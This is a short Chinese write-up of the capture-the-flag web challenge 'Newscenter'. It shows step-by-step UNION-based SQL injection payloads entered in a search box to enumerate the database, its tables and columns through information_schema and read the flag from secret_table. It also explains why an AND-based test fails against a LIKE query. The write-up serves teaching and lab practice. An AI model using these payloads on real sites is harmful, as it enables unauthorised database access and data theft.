攻防世界-Web-Newscenter
0x01
打开题目看到一个网页,里面只有一个搜索输入框是我们可以控制的,所以猜测可能是SQL注入。尝试123asdqwe' or 1=1#
发现能够查询出所有新闻。
继续尝试' union select 1,2,3#
,验证select查询了三个字段:
0x02
已经可以判定是联合注入,接下来就简单了。
查询当前数据库
1' union select 1,2,database()#
,得到数据库为news
查询当前库中的表
1' union select 1,table_name,3 from information_schema.tables where table_schema='news'#
获得两个表名:news和secret_table
查询表中的列
猜测flag极有可能在secret_table里面,下面就查询其中的列名:1' union select 1,column_name,3 from information_schema.columns where table_name='secret_table'#
得到列名有fl4g
查询flag列的值
1' union select 1,fl4g,3 from secret_table#
获取flag
备注
该题是POST类型的注入。当我在测试SQL注入漏洞时使用了常用的1' and '1'='1
发现并不能验证漏洞。这里我猜测可能是题目中使用了like来限定条件而不是等号。
如果输入是1,那么后端拼接完成的语句可能是like '%1%'
,这样就会找出含有1的内容,而我输入1' and '1'='1
就会被拼接成like '%1' and '1'='1%1'
显然是不成立搜不出任何东西。然而用or
就可以验证。